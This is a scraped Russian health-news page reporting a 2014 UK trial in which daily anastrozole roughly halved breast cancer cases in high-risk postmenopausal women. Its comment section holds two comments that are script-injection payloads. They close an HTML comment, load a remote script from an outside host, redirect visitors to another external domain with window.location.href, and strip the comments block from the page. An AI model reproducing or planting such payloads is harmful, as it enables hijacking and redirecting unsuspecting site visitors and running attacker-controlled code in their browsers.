Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Всего одна таблетка в ден...  >>  Всего одна таблетка в день – в 2 раза меньше случаев рака груди!
 
Обратная связь
 

Всего одна таблетка в день – в 2 раза меньше случаев рака груди!

Размер шрифта
13 мая 2014 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Ученые из Великобритании обнаружили, что если принимать в течение пяти лет противоопухолевый препарат анастрозол, риск развития рака груди снижается на 53% в сравнении с плацебо.

Всего одна таблетка в день – в 2 раза меньше случаев рака груди!

Результаты данного исследования были опубликованы в элите медицинской прессы – журнале The Lancet.

Научным центром, на базе которого осуществлялись испытания, стал Лондонский университет королевы Марии. Ученые пытались найти эффективный способ профилактики рака молочной железы, более действенный и безопасный, чем применение популярного антиэстрогенного препарата – тамоксифена.

Авторы проанализировали медицинские данные 4 000 женщин в постменопаузе (то есть, проще говоря, после климакса). Все они имели повышенный риск развития рака молочной железы, что констатировалось исходя из наличия определенных критериев.

Женщины были разделены на две группы: в одной из них испытуемые принимали 1 миллиграмм анастрозола ежедневно, а в другой – плацебо (препарат-пустышка без действующего вещества). Период наблюдения составил пять лет, в течение которых рак груди развился у сорока женщин из первой группы, и у восьмидесяти пяти – из второй.

«Наше исследование открывает новую страницу в напряженной саге под названием «Профилактика рака молочной железы», – рассказывает профессор Джек Кьюзик, глава исследовательской группы. «Теперь мы знаем, что именно анастрозол должен быть препаратом выбора для постменопаузных женщин с высоким риском развития этого опаснейшего заболевания. Этот препарат более безопасен, чем тамоксифен, и, что немаловажно, имеет намного меньше побочных эффектов».

«Как и тамоксифен, анастрозол относится к антиэстрогенным препаратам. Это означает, что он препятствует активности женских половых гормонов – эстрогенов. Этот эффект используется для лечения и профилактики злокачественных новообразований женской груди, потому что они крайне часто растут именно под влиянием женских гормонов. Однако нередко препараты этой группы вызывают серию неприятных побочных эффектов, в том числе выраженный болевой синдром, остеопороз (повышение хрупкости костей) и другие. Однако в ходе нашего исследования мы обнаружили, что в случае анастрозола частота побочных реакций минимальна – лишь немногим больше, чем при применении плацебо».

«Теперь приоритетная задача – внедрить нашу находку в клиническую практику. Мы призываем ведущие медицинские ассоциации соответствующим образом скорректировать клинические рекомендации по лечению и профилактике рака груди с тем, чтобы максимальное количество лечащих врачей и пациенток узнали о потрясающей эффективности анастрозола».

Смело спрашивайте у вашего лечащего врача о вариантах профилактики рака молочной железы. Помните – злокачественную опухоль вылечить намного сложнее, чем предотвратить!

О других гинекологических заболеваниях и о женском здоровье в целом читайте на страницах нашего одноименного специального проекта.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - pomk93

06 июня 2014 в 09:52

Комментарий удален за нарушение Правил общения

2 - zzzzzz

30 июня 2015 в 18:40

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 22:38

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Сон напрямую влияет на рак груди   Простые ежедневные прогулки уменьшают риск рака груди   Как Анджелина Джоли изменила наш мир?   Может ли морковка в день избавить вас от рака груди?  
19 июля 2013У вашего мужа в 3 раза больше шансов совершить самоубийство! А какой шанс у вас? 26 июня 2013Что пить, чтобы не было рака груди?
 
01 ноября 2013ИНВИТРО – «Марка №1» в России 21 октября 2013ИНВИТРО открыла центр лучевой диагностики «ИНВИТРО.Эксперт»
 

Слайдшоу

1
Не ругайтесь на мужа – он продлевает вам жизнь
Ответы на все вопросы о раке груди
Тесты для вашей любимой груди

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Что вы знаете о груди?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.